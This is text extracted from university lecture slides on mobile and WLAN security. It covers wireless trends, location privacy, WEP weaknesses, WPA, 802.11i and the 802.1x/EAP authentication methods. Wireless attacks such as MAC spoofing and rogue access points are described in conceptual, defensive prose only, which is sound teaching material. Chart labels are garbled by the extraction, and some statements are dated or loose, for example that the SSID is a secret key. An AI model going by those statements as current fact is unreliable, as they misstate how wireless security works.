Lecture 3 Mobile Security

Lecture 3 Mobile Security

2

Content

IT Trends & Wireless Technology Development Mobile Security OverviewWLAN SecurityW-WAN Security

IT Trends & Wireless Technology Development

4

10-Year Microprocessor Speed Estimates

2000

2001

2002

2003

2004

2005

2006

2007

2008

2009

2010

1.83.6

7.2

14.4

28.8

57.6

115

0-

1-

10-

50-

100-

Bill

ions

of i

nstr

uctio

ns p

er se

cond

s

Source: The Cato Institute

Double the Speed every 18 months- follow the Moores Law

Microprocessor Speeds will jump to 115 GH by 2010Microprocessor Speeds will jump to 115 GH by 2010

5

19931993 19981998 2002200219841984 19941994 19981998 20002000

Cost perGigabit-Mile

50 Mbps50 Mbps2.5 Gbps2.5 Gbps

1.6 Tbps1.6 Tbps

320 Gbps320 Gbps

Both Capacity Increase & New EconomicsBoth Capacity Increase & New EconomicsHave Come Together...Have Come Together...

Optical Networking Breakthrough!

Moore’sLaw

Revolution

6

Eliminating downtime and the WWW (world.wide.wait)

In 2001, an estimated 2.5 billion hours

were wasteddownloading web pages

Uptime Downtime

Dialtone 99.999% 5 min/yearE-mail 99.8% 18 hours/yearWeb 99.0% 88 hours/year

7

Wireless versus Wired

0

400

800

1200

1600

2000

1997

1998

1999

2000

2001

2002

2003

2004

2005 20

06

2007

2008

2009

2010

Line

s(m

illion

)

Mobility

Fixed

1 Billion

8

Internet• 20+ million hosts• ~175 million users• Users doubling every

6 months• 1000% annual traffic

growth• Base of global

“networked economy”

Wireless• ~ 400 M Subscribers• ~ 1 B by 2005• Ubiquitous services• Replacing wireline• Voice becoming

commodity • Advanced services

• 75% laptop users are also wireless voice users

• 95% of palm size device usersare Internet users as well

Colliding Worlds: Wireless and Internet

Wireless + Internet + Information Mobility= Explosive Demand for Wireless InternetWireless + Internet + Information Mobility= Explosive Demand for Wireless Internet

9

Wireless Internet: Variety of Devices

Rocket eBookAudible

MobilePlayerDiamond RIO Clarion AutoPC

Laptop PCHandheld PCPersonal

InformationManager

Handset

Personal Communicator

10

Location Services: Traffic Cameras

11

- Video next standard feature- Video next standard feature

Image quality degraded as these are scanned imagesImage quality degraded as these are scanned images

3G Wireless service example: Video Cell phones

12

Personal Personal Area Area

NetworkNetwork

Local Local Area Area

NetworkNetwork

Wide Area Wide Area NetworkNetwork

LAN

CDPD GSMCDMA GPRS UMTS

Cable-replacement technologyDesigned to allow devices to share their capabilities without having to use wires

Cell phones (Tx/Rx)PDAs (data)Headsets (voice)Printers

Will replace iRDA portRange is 10m – 100mBluetooth is NOT a LAN!

TDMA (IS-136)

GSM

PDC cdmaOne

GPRS

1xRTT

EDGE

WCDMA

cdma2000 MC

Provides users with ‘Anywhere, Anytime’ access to informationRequires a Wireless Service Provider. Airtime contract, etcCurrently, there are no dominant standards in the US

Europe has GSMAllowed that market to develop ahead of US

Distance is unlimited

Extension to a normal corporate LAN infrastructureAllows users to connect to LAN via wireless ‘Access Points’

Provides exactly the same features as a normal ‘wired’connection

Range is 100m+

Wireless Technologies

Mobile Security Overview

14

The Increasing Amount of Mobile Malware

Number of mobile malware

0

20

40

60

80

100

120

140

160

180

200

15.6

.200

4

15.7

.200

4

15.8

.200

4

15.9

.200

4

15.1

0.20

04

15.1

1.20

04

15.1

2.20

04

15.1

.200

5

15.2

.200

5

15.3

.200

5

15.4

.200

5

15.5

.200

5

15.6

.200

5

15.7

.200

5

15.8

.200

5

15.9

.200

5

15.1

0.20

05

15.1

1.20

05

15.1

2.20

05

15.1

.200

6

15.2

.200

6

15

Questions of Interest

ResearchPractice

SecurityWhat motivates users to protect

themselves?

How safe are users?

Location & Privacy

What constitutes “location & privacy”?

How are users being tracked?

16


ResearchPractice


themselves?

How safe are users?

Location & Privacy

What constitutes “location privacy”?


17

Location & Privacy Practice

How many ways have you been located today?

When I walked by the security camera.When I carry my cell phone, turned on.When I put my card in the ATM machine.When I scanned my ID card to enter a room.When I used my laptop computer on campus.When I passed by a Bluetooth-enabled printer.…

18http://www.towermaps.com/images/nationwide5.gif

220,000 Cell Towers Can Find You

19http://www.cercs.gatech.edu/tech-reports/tr2006/git-cercs-06-10.pdf

Millions of Wi-Fi Access Points Can Find You

20


ResearchPractice


themselves?

How safe are users?

Location & Privacy



21

Location & Privacy Research

Privacy is the ability to control information about yourselfLocation privacy is determined by location information

GatheringStorageUseSharingCombination

Minch, Robert P. “Privacy Issues in Location-Aware Mobile Devices.” Proceedings of the Thirty-Seventh Annual Hawaii International Conference on System Sciences. (IEEE Computer Society, January 2004)

22

How Many of You Are OK With:

Being located when calling 911?Being located by friends and family?Being located by your boss?Being a suspect if you drove by a convenience store while it was robbed?Getting a ticket every time you speed?Having your health insurance rates rise when you visit a friend in a cancer clinic?

23


ResearchPractice


themselves?

How safe are users?

Location & Privacy



24

Security Practice

Wireless security is largely a user problemUsers must protect their own machinesOrganizations must protect against infected or malicious users

Many private APs are inadvertently insecureMany public APs are deliberately insecureWireless (client) security means

Firewall properly installed & configuredProtection against malware (viruses, spyware)

25

Security Practice

How many of you have a wireless access point at home?How many of you have it secured with a password?How many of you use public hot spots at coffee shops, hotels, etc.?How many of you do sensitive things like e-banking there without safeguards?

26

Security Practice On Campus

4/27/06 to 6/7/06: 3331 Boise State campus wireless users scanned287 (9%) had open ports189 of the 287 (6% of all users scanned) had at least one open port with significant security implicationsVulnerabilities included open ports for

File/print sharingRemote desktop (remote control of your machine)

Evidence of malware includedClandestine remote controlKeystroke loggingPassword cracking“Zombies” for denial of service attacks

Chenoweth, Tim; Minch, Robert; and Tabor, Sharon. "User Security Behavior on Wireless Networks: An Empirical Study." Proceedings of the Fortieth Annual Hawaii International Conference on System Sciences (IEEE Computer Society, January 2007)

27


ResearchPractice


themselves?

How safe are users?

Location & Privacy



28

Security Research

Traditional models for predicting & motivating acceptance & adoption of technology emphasize achieving gains.

Perceived Ease of Use

Perceived Usefulness

Intention to Use Actual Use Effective Use

“Technology Acceptance Model”

29

Security Research

What’s needed to predict and motivate adoption of security control technology might be to emphasize avoiding problems.

Severity

Vulnerability

Intention Actual Use

Effective UseResponse

Effectiveness

Self Efficacy

“Protection Motivation Theory”

WLAN Security

31

Contents

Wireless LAN OverviewVulnerabilitiesWEPWPA802.11iEAP

32

802.11 Standards

802.11 The original WLAN Standard. Supports 1 Mbps to 2 Mbps.

802.11a High speed WLAN standard for 5 Ghz band. Supports 54 Mbps.

802.11b WLAN standard for 2.4 Ghz band. Supports 11 Mbps.

802.11e Address quality of service requirements for all IEEE WLAN radio interfaces.

802.11f Defines inter-access point communications to facilitate multiple vendor-distributed WLAN networks.

802.11g Establishes an additional modulation technique for 2.4 Ghz band. Intended to provide speeds up to 54 Mbps. Includes much greater security.

802.11h Defines the spectrum management of the 5 Ghz band for use in Europe and in Asia Pacific.

802.11i Address the current security weaknesses for both authentication and encryption protocols. The standard encompasses 802.1X, TKIP, and AES protocols.

33

Vulnerabilities

34

Vulnerabilities

There are several known types of wireless attacks that must be protected against:

SSID (network name) sniffingWEP encryption key recovery attacksARP poisoning (“man in the middle attacks”)MAC address spoofingAccess Point management password and SNMP attacksWireless end user (station) attacksRogue AP attacks (AP impersonation)DOS (denial of service) wireless attacks

35

Diversity Antenna AttacksIf diversity antennas A and B are attached to an AP, they are setup to cover both sides of tan area independently. Alice is on the left side of the area, so the AP will choose antenna A for the sending and receiving frames. Bob is on the opposite side of the area from Alice and will therefore send and receive frames with antenna B. Bob can take Alice off the network by changing his MAC address to be the same as Alice's. Bob can also guarantee that his signal is stronger on antenna B than Alice's signal on antenna A by using an amplifier or other enhancement mechanism. Once Bob's signal has been detected as the stronger signal on antenna B, the AP will send and receive frames for the MAC address on antenna B. As long as Bob continues to send traffic to the AP, Alice's frames will be ignored.

36

Malicious AP overpowering valid APIf a client is not using WEP authentication (or an attacker has knowledge of the WEP key), then the client is vulnerable to DoS attacks from spoofed APs. Clients can generally be configured to associate with any access point or to associate to an access point in a particular ESSID.

If a client is configured to associate to any available AP, it will select the AP with the strongest signal regardless of the ESSID. If the client is configured to associate to a particular ESSID, it will select the AP in the ESSID with the strongest signal strength.

Either way, a malicious AP can effectively black-hole traffic from a victim by spoofing the desired AP.

37

Man-in-the-Middle AttacksMan-in-the-middle (MITM) attacks have two major forms: eavesdropping and manipulation.

Eavesdropping occurs when an attacker receives a data communication stream. This is not so much a direct attack as much as it is a leaking of information. An eavesdropper can record and analyze the data that he is listening to. A manipulation attack requires the attacker to not only have the ability to receive the victim's data but then be able to retransmit the data after changing it.

38

What Exactly Is 802.1x?

Standard set by the IEEE 802.1 working group.Describes a standard link layer protocol used for transporting higher-level authentication protocols.Works between the Supplicant (Client Software) and the Authenticator (Network Device).Maintains backend communication to an Authentication (Typically RADIUS) Server.

39

What Exactly Is 802.1xIEEE802.1x is the denotation of a standard that is titled “Port Based Network Access Control”, which indicates that the emphasis of the standard is to provide a control mechanism to connect physically to a LAN. The standard does not define the authentication methods, but it does provide a framework that allows the application of this standard in combination with any chosen authentication method. It adds to the flexibility as current and future authentication methods can be used without having to adapt the standard.

40

What Does it Do?

Transport authentication information in the form of Extensible Authentication Protocol (EAP) payloads.The authenticator (switch) becomes the middleman for relaying EAP received in 802.1x packets to an authentication server by using RADIUS to carry the EAP information.Several EAP types are specified in the standard.Three common forms of EAP are

EAP-MD5 – MD5 Hashed Username/PasswordEAP-OTP – One-Time PasswordsEAP-TLS – Strong PKI Authenticated Transport Layer

Security (SSL)

802.1x Header

EAP Payload

41

802.1x Components

The 802.1x standard recognizes the following concepts:

Port Access Entity (PAE)which refers to the mechanism (algorithms and protocols) associated with a LAN port (residing in either a Bridge or a Station)

Supplicant PAEwhich refers to the entity that requires authentication before getting access to the LAN (typically in the client station)

Authenticator PAEwhich refers to the entity facilitating authentication of a supplicant (typically in bridge or AP)

Authentication serverwhich refers to the entity that provides authentication service to the Authenticators in the LAN (could be a RADIUS server)

42

802.1x Components

43

What is RADIUS?

RADIUS – The Remote Authentication Dial In User ServiceA protocol used to communicate between a network device and an authentication server or database.Allows the communication of login and authentication information. i.e. Username/Password, etc. using Attribute/Value pairs (Attribute = Value)Allows the communication of extended attribute value pairs using “Vendor Specific Attributes” (VSAs).Can also act as a transport for EAP messages.

RADIUS Header EAP PayloadUDP Header

44

802.1x Call Flow

45

802.1x Call Flow

46

802.1x Traffic

As the picture indicates, EAP information, when transmitted fromSupplicant to Authentication Server, is first encapsulated within a (wireless) LAN frame (referred to as EAP over LAN or EAPoL). Once received by the Authenticator it is extracted from the LAN frame and placed in a packet that conforms to the RADIUS protocol. This RADIUS packet is then transmitted to the Authentication using the RADIUS (UDP) protocol.Traffic coming from the Authentication Server to the Supplicant follows the reverse process.

47

802.11 AuthenticationThe 802.11 standard defines several services that govern how two 802.11 devices communicate. The following events must occur before an 802.11 station can communicate with an Ethernet network through a wireless access point provides:

1. Turn on the wireless Client2. Client listens for messages from any access points (AP) that are

in range3. Client finds a message from an AP that has a matching SSID4. Client sends an authentication request to the AP5. AP authenticates the station6. Client sends an association request to the AP7. AP associates with the station8. Client can now communicate with the Ethernet network thru the

AP

48

Basic 802.11 Security

SSID (Service Set Identifier) or ESSID (Extended Service Set Identifier)

Each AP has an SSID that it uses to identify itself. Network configuration requires each wireless client to know the SSID of the AP to which it wants to connect. SSID provides a very modest amount of control. It keeps a client from accidentally connecting to a neighboring AP only. It does not keep an attacker out.

49

SSIDSSID (Service Set Identifier) or ESSID (Extended Service Set Identifier)

The SSID is a token that identifies an 802.11 network. The SSID is a secret key that is set by the network administrator. Clients must know the SSID to join an 802.11 network; however, network sniffing can discover the SSID.The fact that the SSID is a secret key instead of a public key creates a management problem for the network administrator.

Every user of the network must configure the SSID into their system. If the network administrator seeks to lock a user out of the network, the administrator must change the SSID of the network, which requires reconfiguration of every network node. Some 802.11 NICs allow you to configure several SSIDs at one time.

50


MAC filtersSome APs provide the capability for checking the MAC address of the client before allowing it to connect to the network. Using MAC filters is considered to be very weak security because with many Wi-Fi client implementations it is possible to change the MAC address by reconfiguring the card. An attacker could sniff a valid MAC address from the wireless network traffic .

51


Static WEP keysWired Equivalent Privacy (WEP) is part of the 802.11 specification. Static WEP key operation requires keys on the client and AP that are used to encrypt data sent between them. With WEP encryption, sniffing is eliminated and session hijacking is difficult (or impossible). Client and AP are configured with a set of 4 keys, and when decrypting each are used in turn until decryption is successful. This allows keys to be changed dynamically.Keys are the same in all clients and AP. This means that there is a “community” key shared by everyone using the same AP. The danger is that if any one in the community is compromised, the community key, and hence the network and everyone else using it, is at risk.

52

WEP – What?

WEP (Wired Equivalent Privacy) referring to the intent to provide a privacy service to wireless LAN users similar to that provided by the physical security inherent in a wired LAN.WEP is the privacy protocol specified in IEEE 802.11 to provide wireless LAN users protection against casual eavesdropping.

53

WEP – How?

When WEP is active in a wireless LAN, each 802.11 packet is encrypted separately with a RC4 cipher stream generated by a 64 bit RC4 key. This key is composed of a 24 bit initialization vector (IV) and a 40 bit WEP key.The encrypted packet is generated with a bit-wise exclusive OR (XOR) of the original packet and the RC4 stream.The IV is chosen by the sender and should be changed so that every packet won't be encrypted with the same cipher stream. The IV is sent in the clear with each packet. An additional 4 byte Integrity Check Value (ICV) is computed on the original packet using the CRC-32 checksum algorithm and appended to the end. The ICV (be careful not to confuse this with the IV) is also encrypted with the RC4 cipher stream.

54

WEP - Weaknesses

Key Management and Key SizeKey management is not specified in the WEP standard, and therefore is one of its weaknesses, because without interoperable key management, keys will tend to be long-lived and of poor quality.

The Initialization Vector (IV) is Too SmallWEP’s IV size of 24 bits provides for 16,777,216 different RC4 cipher streams for a given WEP key, for any key size. Remember that the RC4 cipher stream is XOR-ed with the original packet to give the encrypted packet which is transmitted, and the IV is sent in the clear with each packet.

The Integrity Check Value (ICV) algorithm is not appropriateThe WEP ICV is based on CRC-32, an algorithm for detecting noise and common errors in transmission. CRC-32 is an excellent checksum for detecting errors, but an awful choice for a cryptographic hash.

55

WEP - Weaknesses

WEP’s use of RC4 is weakRC4 in its implementation in WEP has been found to have weak keys. Having a weak key means that there is more correlation between the key and the output than there should be for good security. Determining which packets were encrypted with weak keys is easy because the first three bytes of the key are taken from the IV that is sent unencrypted in each packet. This weakness can be exploited by a passive attack. All the attacker needs to do is be within a hundred feet or so of the AP.

Authentication Messages can be easily forged802.11 defines two forms of authentication:

Open System (no authentication) and Shared Key authentication.

These are used to authenticate the client to the access point. The idea was that authentication would be better than no authentication because the user has to prove knowledge of the shared WEP key, in effect, authenticating himself.

56

Authentication Type: Open System Authentication

The following steps occur when two devices use Open System Authentication:

The station sends an authentication request to the access point.The access point authenticates the station.The station associates with the access point and joins the network.

The process is illustrated below.

57

Authentication Type: Shared Key Authentication

The following steps occur when two devices use Shared Key Authentication:

1. The station sends an authentication request to the access point.

2. The access point sends challenge text to the station.3. The station uses its configured 64-bit or 128-bit default key to

encrypt the challenge text, and sends the encrypted text to the access point.

4. The access point decrypts the encrypted text using its configured WEP Key that corresponds to the station’s default key.

5. The access point compares the decrypted text with the original challenge text. If the decrypted text matches the original challenge text, then the access point and the station share the same WEP Key and the access point authenticates the station.

6. The station connects to the network.

58

Authentication Type: Shared Key AuthenticationIf the decrypted text does not match the original challenge text(i.e., the access point and station do not share the same WEP Key), then the access point will refuse to authenticate the station and the station will be unable to communicate with either the 802.11 network or Ethernet network.The process is illustrated in below.

59

WPAWi-Fi Protected Access (WPA) is a new security guideline issued by the Wi-Fi Alliance. The goal is to strengthen security over the current WEP standards by including mechanisms from the emerging 802.11i standard for both data encryption and network access control.Path: WEP -> WPA -> 802.11iWPA = TKIP(Temporal Key Integrity Protocol) + IEEE 802.1x

For encryption, WPA has TKIP, which uses the same encryption algorithm as WEP, but constructs keys in a different way. For access control, WPA will use the IEEE 802.1x protocol.

60

802.11i – Future Wireless Security Standard

Task group "i" within the IEEE 802.11 is responsible for developing a new standard for WLAN security to replace the weak WEP (Wired Equivalent Privacy). The IEEE 802.11i standard utilizes the authentication schemes of 802.1x and EAP(Extensible Authentication Protocol) in addition to a new encryption scheme – AES (Advanced Encryption Standard) and dynamic key distribution scheme - TKIP(Temporal Key Integrity Protocol).802.11i = TKIP + IEEE 802.1x + AES

61

802.11i – Future Wireless Security StandardTemporal Key Integrity Protocol (TKIP)

The Temporal Key Integrity Protocol is part of the IEEE 802.11i encryption standard for wireless LANs. TKIP is the next generation of WEP, which is used to secure 802.11 wireless LANs. TKIP provides per-packet key mixing, a message integrity check and a re-keying mechanism, thus fixing the flaws of WEP.

62

802.11i – Future Wireless Security StandardAdvanced Encryption Standard (AES)

AES is the U.S. government's next-generation cryptography algorithm, which will replace DES and 3DES.

AES Triple-DES

Type of algorithm Symmetric, block cipher Symmetric, feistel cipher

Key size (in bits) 128, 192, 256 112 or 168

Speed High Low

Time to crack (assume a machine could try 255 keys per second - NIST)

149 trillion years 4.6 billion years

Resource consumption Low Medium

AES vs. Triple-DES

63

EAP

EAP was originally designed as part of the PPP (Point-to-Point Protocol)

The PPP Extensible Authentication Protocol (EAP) is a general protocol for PPP authentication which supports multiple authentication mechanisms. It was developed in response to an increasing demand for remote access user authentication that uses other security devices.

By using EAP, support for a number of authentication schemes may be added by defining EAP-Types. Support might include one-time passwords, public key authentication using smart card, certificates, and others. EAP hides the details of the authentication scheme from those network elements that need not know

For example in PPP, the client and the AAA server only need to know the EAP type, and the Network Access Server does not

64

EAP

RFC 2284 defines PPP Extensible Authentication Protocol. EAP does not select a specific authentication mechanism at Link Control Phase, but rather postpones this until the Authentication Phase.

This allows the authenticator to request more information before determining the specific authentication mechanism. This also permits the use of a "back-end" server which actually implements the various mechanisms while the PPP authenticator merely passes through the authentication exchange.

65

EAP Architecture

Other EAP

Types

66

EAP Comparison

67

EAP Comparison

68

69

70

EAP Elements

EAP basically consists of four different protocol elements:

Request packets (from Authenticator [AP] to client [Supplicant])Response packets (from Client to Authenticator)Success packetFailure packet

71

EAP Message

All EAP messages have a common format:

Code Identifier Length

0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 10 1 2 3

Data ...

Code: 1 byte, representing the type of EAP message

Data: any size,

The message’s data

ID: 1 byte,

Used for matching requests and responses

Length: 2 byte,

The total message length

72

EAP Message 2

EAP request and response messages have the same format , with code=1 for requests and code=2 for responses

Code Identifier Length

0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 10 1 2 3

Type Data .Type

Type: 1 byte,

The type of authentication protocol used

Data: any size,

Data used for the authentication process

73

EAP Message 3

EAP Success messages are EAP messages with code 3 and no data.

A success message means that the authentication concluded successfully.

EAP failure messages are EAP messages with code 4 and no data.

A Failure message means that the authentication has failed.

74

General Description ofIEEE 802.1x Terminology

Supplicant Authentication ServerAuthenticatorOperates on client Processes EAP requestsOperates on devices

at network edge, like APs and switches

wireless networkwireless network enterprise networkenterprise networkenterprise edgeenterprise edge

EAP over wirelessEAP over wireless EAP over RADIUSEAP over RADIUS RADIUS server

75

Before EAP Start

normal data

authentication traffic

802.1X traffic RADIUS traffic

(IP/UDP over Layer 2 protocol

(Eg. Ethernet)

• 802.11 association between client and authenticator• IP connection blocked by AP

AP transfers data from 802.1x EAP messages into RADIUS messages, and visa versa

AP blocks IP connection until RADIUS access-accept is received

EAP over wirelessEAP over wireless EAP over RADIUSEAP over RADIUS RADIUS server

76

802.1x Call Flow

77

EAP Flow

After the Link Establishment phase is complete, the authenticator sends one or more Requests to authenticate the peer. The Request has a type field to indicate what is being requested. Examples of Request types include Identity, MD5-challenge, One-Time Passwords, etc. Typically, the authenticator will send an initial Identity Request followed by one or more Requests for authentication information. However, an initial Identity Request is not required, and MAY be bypassed in cases where the identity is presumed (leased lines, dedicated dial-ups, etc.).

78

EAP Flow

The peer sends a Response packet in reply to each Request. As with the Request packet, the Response packet contains a type field which corresponds to the type field of the Request.The authenticator ends the authentication phase with a Success or Failure packet.

79

Generic EAP Authentication Flow

AuthenticatorPeer

Repeated as many times as needed

EAP Request

EAP Response with the same type or a Nak

EAP Success or EAP Failure message

EAP Request

EAP Response with the same type or a Nak

EAP Success or failure message

Repeated as needed

If mutualAuthIs required

Identity Request

Identity Response

Identity RequestIdentity Response

80

EAP Authentication

Physical connection between the client station and the network is established first, which for wireless operation means that 802.11 Association has to be completed (this is the equivalent of plugging in a wired station in an Ethernet wall socket).

81

EAP Authentication

After Association the 802.1x authentication commences, initiated by the Authenticator (i.e. the AP), which sends an EAP Request to the Supplicant (i.e. the client station) asking for its credentials. These credentials could be machine name or user name, depending on the authentication method that is used.

82

EAP Authentication

The Supplicant transmits its identity information as part of an EAP response to the Authenticator, which takes the packet from the LAN frame and encapsulates it in a RADIUS protocol message for transmission to the Authentication Server.

83

EAP Authentication

At this point a sequence of exchanges will take place between the Authentication Server and the Supplicant (via the Authenticator), of which the exact details depend on the Authentication method used. The ultimate result of the complete sequence is either a positive result, where the supplicant is successfully authenticated, or a negative one where the authentication has failed. In the first case the “door” to network is opened and all network resources are now available for the client device, while in the second case the network access remains blocked.

84

EAP Authentication Methods – MD5

EAP-Message Digest 5 uses the same challenge handshake protocol as PPP-based CHAP, but the challenges and responses are sent as EAP messages.

EAP-MD5 does not support the use of per session WEP keys, or mutual authentication of Access Point and client. It also does not support encrypted links for user data, so cannot be used in an 802.11i environment.

The EAP-MD5 authentication algorithm provides one-way password based network authentication of the client.

85

EAP Authentication Methods – MD5

This algorithm can also be used for wireless applications with less stringent wireless LAN security requirements.

Advantage of using EAP-MD5 is that it is simple to administer for an operator, re-using the database of usernames and passwords which may exist currently.Disadvantage of using EAP-MD5 in wireless LAN applications is that no encryption keys are generated. Also, while the protocol can be used by the client to authenticate the network, it is typically used only for the network to authenticate the client.

86

EAP Authentication Methods – MD5• A wireless station associates to its AP.• The AP will issue an EAP Request Identity frame to the client station.• The client station responds with its identity (machine name or user name).• The AP relays the EAP message (I.e. client station’s identity) to the RADIUS

server, to initiate the authentication services.• The MD5 protocol replies on a challenge text issued by the server to the client.• Client is to encrypt this challenge using its user password and return the result.

87

EAP Authentication Methods – MD5The server will decrypt the result using the password that is recorded for the user.When results match the original, the client is validated as genuine.No encryption keys are generated.

88

EAP – MD5

89

EAP Authentication Methods – TLS

Transport Layer Security (TLS) is a certificate based authentication protocol. RFC 2716 provides mutual authentication and supports per-session WEP keys. Certificate based authentication provides a highly secure digital equivalent of ID cards used by both the client and network so they can authenticate each other. Public Key Infrastructure (PKI) digital signature techniques are used to prove each party’s authenticity.

90


A digital certificate is comprised of the following fields:a versioncertificate serial numbersignature algorithm identifiername of the issuervalidity periodnamepublic keyoptional unique identifiersa signature value.

91

Certificate Authority

92

EAP Authentication Methods – TLSA wireless station associates to its AP.The AP will issue an EAP Request Identity frame to the client station.

93

EAP Authentication Methods – TLSThe client station responds with its identity (machine name o r user name) .The AP relays the EAP m e s s a g e ( I . e . c l i e n t station’s identity) to the RADIUS server, to initiate the authentication services.

94

EAP Authentication Methods – TLSThe RADIUS server requests credentials from the client station to confirm the identity, by sending the EAP request via the AP.The client replies sending its credentials relayed by the AP.

95


The “TLS_Hello” messages are the start of the TLS handshake protocol:

Server initiates by sending its Server_hello (including, the Certificate, the so-called Cipher suite, indicating what crypto algorithm it can handle).Client replies with Client_Hello, stating among others its certificate, what crypto-algorithm was selected, and requesting the server to send its certificate.The client and Server engage in the “Key-Exchange”sequence (Diffie-Hellman).

96

EAP Authentication Methods – TLSOn completion of the DH Key exchange between server and client, the server transmits its keys to the AP.To encrypt subsequent IEEE 802.11 frames exchanged between the AP and the client, a WEP key pair is used, that is generated by the AP, and is the same for all clients associated to this particular AP.The AP will transmit this key pair to the client and uses the key received from the server to encrypt this message.Once the client received the WEP keys it will pass them to the PC card via the NDIS interface and the driver.Station and AP will use these WEP keys until station logs off or until re-authentication timer has expired (for period re-authentication).When station roams to another AP a re-authentication is required and new WEP keys are established.

97


98

99

100

EAP Authentication Methods – TTLS

Tunneled Transport Layer Security (TTLS) and Protected Extensible Authentication Protocol (PEAP) are similar in operation and support both secure username/password and mutual authentication. EAP-TTLS a combination of both EAP-TLS, and traditional password-based methods such as Challenge Handshake Authentication Protocol (CHAP), and One Time Password (OTP). On the client side merely passwords are required instead of digital certificates, which relieves the administrator of the systems to manage and distribute certificates. On the authentication server side a certificate is required.Certificates do not have to be installed in each client device. This is because PKI techniques are used to first allow the client to authenticate the server (via a certificate installed on the server) and form a secured connection between client and server. Then the server authenticates the client over the secured connection with the user providing ausername and password pair. This principle is much like the way in which browser based commerce takes place today over web browsers. Secure connections are established before the user’s authentication information is exchanged. Users see this typically as a padlock symbol in their browsers.

101


In EAP-TTLS a secure TLS tunnel is first established between the supplicant and the authentication server. The client authenticates the network to which it is connecting by authenticating the digital certificate provided by the TTLS server. This is exactly analogous to the techniques used to connect to asecure web server. Once an authenticated “tunnel” is established, the authentication of the end user occurs. EAP-TTLS has the added benefit of protecting the identity of the end user from view over the wireless medium. In this way anonymity of the end user, a desirable attribute is provided.EAP-TTLS also enables existing end-user authentication systems to be reused. Two key advantages of EAP-TTLS are that anonymity of the end user is provided, and that any existing RADIUS server and its associated database can be re-used. EAP-TTLS is the only EAP type to date which provides end user anonymity.

102

EAP Authentication Methods – TTLSA wireless station associates to its AP.The AP will issue an EAP Request Identity frame to the client station.The client station responds with its identity (machine name or user name).The AP relays the EAP message (I.e. client station’s identity) to the RADIUS server, to initiate the authentication services.The authentication protocol between the RADIUS server and the client station is still TLS and used to allow the client to authenticate the server.

103

EAP Authentication Methods – TTLSThe “TLS_Hello” messages are the start of the TLS handshake protocol:

Server initiates by sending its Server_hello (including its certificate and Cyphersuite, indicating what crypto algorithm it can handle).Client responds by sending its acknowledgement for the crypto protocol to use (no certificates).The client and Server engage in the “Key-Exchange” sequence (Diffie-Hellman).Now the tunnel is established and secure, the additional user credentials are exchanged (using OTP or CHAP).

104


On completion of the exchange between server and client, the server transmits its keys to the AP.To encrypt subsequent IEEE 802.11 frames exchanged between the AP and the client, a WEP key pair is used, that is generated by the AP, and is the same for all clients associated to this particular AP.The AP will transmit this key pair to the client and uses the key received from the server to encrypt this message.Once the client received the WEP keys it will pass them to the PC card via the NDIS interface and the driver. Station and AP will use these WEP keys until station logs off or until re-authentication timer has expired (for

period re-authentication).

105


106

EAP Authentication Methods – PEAP

Protected EAP (PEAP): A version of EAP developed by Microsoft, Cisco, and RSA Security that offers two implementation options. The first uses the Microsoft Challenge-Handshake Authentication Protocol Version 2 (MS-CHAPv2) for mutual authentication and does not require client digital certificates.The second implementation uses TLS for mutual authentication and requires digital certificates on all the clients (very similar to EAP-TLS).

107


108

PEAP w MS-CHAPv2The PEAP authentication process occurs in two parts. The first part is the use of EAP and the PEAP EAP type to create an encrypted TLS channel. The second part is the use of EAP and a different EAP type to authenticate network access. The following examines PEAP with MS-CHAP v2 operation, using as an example, a wireless client that attempts to authenticate to a wireless access point (AP) that uses a RADIUS server for authentication and authorization.

109

PEAP w MS-CHAPv2PEAP Part 1-Creating the TLS Channel

The following steps are used to create the PEAP TLS channel:After creating the logical link, the wireless AP sends an EAP-Request/Identity message to the wireless client. The wireless client responds with an EAP-Response/Identity message that contains the identity (user or computer name) of the wireless client. The EAP-Response/Identity message is sent by the wireless AP to the RADIUS server. From this point on, the logical communicationoccurs between the RADIUS server and the wireless client, using the wireless AP as a pass-through device. The RADIUS server sends an EAP-Request/Start PEAP message to the wireless client. The wireless client and the RADIUS server exchange a series of TLS messages through which the cipher suite for the TLS channel is negotiated and the RADIUS server sends a certificate chain to the wireless client for authentication.

At the end of the PEAP negotiation, the RADIUS server has authenticated itself to the wireless client. Both nodes have determined mutual encryption and signing keys (using public key cryptography, not passwords) for the TLS channel

110


EAP-Request / Identity

EAP- Response / Identity [My Domain]

EAP-Request (Type = PEAP, start)

TLS Handshake PEAPServer

Client

EAP- Response (empty)

111

PEAP w MS-CHAPv2PEAP Part 2-Authenticating With MS-CHAP v2

After the PEAP TLS channel is created, the following steps are used to authenticate the wireless client credentials with MS-CHAP v2:

The RADIUS server sends an EAP-Request/Identity message. The wireless client responds with an EAP-Response/Identity message that contains the identity (user or computer name) of the wireless client. The RADIUS server sends an EAP-Request/EAP-MS-CHAP-V2 Challenge message that contains a challenge string. The wireless client responds with an EAP-Response/EAP-MS-CHAP-V2 Response message that contains both the response to the RADIUS server challenge string and a challenge string for the RADIUS server. The RADIUS server sends an EAP-Request/EAP-MS-CHAP-V2 Success message, which indicates that the wireless client response was correct and contains the response to the wireless client challenge string. The wireless client responds with an EAP-Response/EAP-MS-CHAP-V2 Ack message, indicating that the RADIUS server response was correct. The RADIUS server sends an EAP-Success message.

At the end of this mutual authentication exchange, the wireless client has provided proof of knowledge of the correct password (the response to the RADIUS server challenge string) and the RADIUS server has provided proof of knowledge of the

112


PEAPServerClient

EAP-Request / Identity

EAP-Response / Identity [My ID]

EAP-Request / Type = X (MD5, OTP, etc)Establish EAP method and

Perform authentication

EAP-Success / EAP-Failure

Transfer of the generated key from the PEAP server to the NAS if on different machines

113


114


115

EAP Authentication Methods – MS-CHAPv2

The Microsoft EAP CHAP Extensions Version 2 (EAP MSCHAPv2) protocol allows mutual authentication between an authenticator and a peer that is seeking authentication. It extends the MSCHAPv2 protocol defined in RFC 2759, and is one of several authentication methods associated with the Extensible Authentication Protocol (EAP) defined in RFC 2284.

116

EAP methods based on GSM credentials

Support for SIM and USIM (AKA) credentialsUses standard SIM (Subscriber Identity Module) and USIM(UMTS Subscriber Identity Module) cards

Wireless phone SIM cards as a way of obtaining authentication using SIM Extensible Authentication Protocol for GSM (EAP-SIM) Using USIM Extensible Authentication and Key Agreement Protocol (EAP-AKA) for UMTS.

Generates 128 bit keys, has optional fast reconnect and identity privacy support

117

